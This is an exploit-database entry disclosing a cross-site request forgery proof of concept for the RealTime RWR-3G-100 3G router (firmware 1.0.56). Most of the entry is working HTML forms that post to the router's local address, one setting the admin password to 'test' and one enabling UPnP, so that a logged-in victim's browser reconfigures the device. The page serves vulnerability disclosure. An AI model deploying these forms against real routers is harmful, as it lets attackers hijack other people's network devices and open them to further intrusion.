RealTime RWR-3G-100 Router Cross-Site Request Forgery

2017.08.13
Credit: Touhid M.Shaikh
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

<!-- # Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery (Change Admin Password) # Date: 13 Aug, 2017 # Vendor Homepage : http://www.rtsindia.com/ # Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd. # Firmware Version : Ver1.0.56 # Exploit Author: Touhid M.Shaikh # Contact: https://github.com/touhidshaikh # Website: http://touhidshaikh.com/ =================== Product Description =================== Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB Dongle to get connected to Broadband/ Optionally Uses Wired Broadband connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for Multiple Users to get connected to Broadband. Small & Sleek Portable Router, Easy to Install & Manage. --> <!-- CHANGE ADMIN PASSWORD to test--> <form action=http://192.168.1.1/goform/formPasswordSetup method=POST name="password"> <input type="text" name="username" value="admin"> <input type="password" name="newpass" value="test"> <input type="password" name="confpass" value="test"> <input type="hidden" value="/status.asp" name="submit-url"> <input type="submit" value="Apply Changes" name="save"> <input type="reset" value=" Reset " name="reset" id="password Reset"> </form> <!-- CHANGE ADMIN PASSWORD Ends here--> <!---Enable The UPNP Service--> <form action=http://192.168.1.1/goform/formUpnpSetup method=POST name="upnpSetup"> <input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes" checked> <input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" > <!-- <input type="radio" name="avupnpfunction" id="avupnpfunctiony" value="yes" checked> <input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no" > --> <input type="submit" value="Apply Changes" name="save" id="upnp apply" > <input type="reset" value=" Reset " name="reset" id="upnp Reset"> <input type="hidden" value="/upnp.asp" name="submit-url"> </form> <!---Enable The UPNP Service Ends here--> <!-- ======GREEtZ===== my cool Broo and Pratik K.tjani -->


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top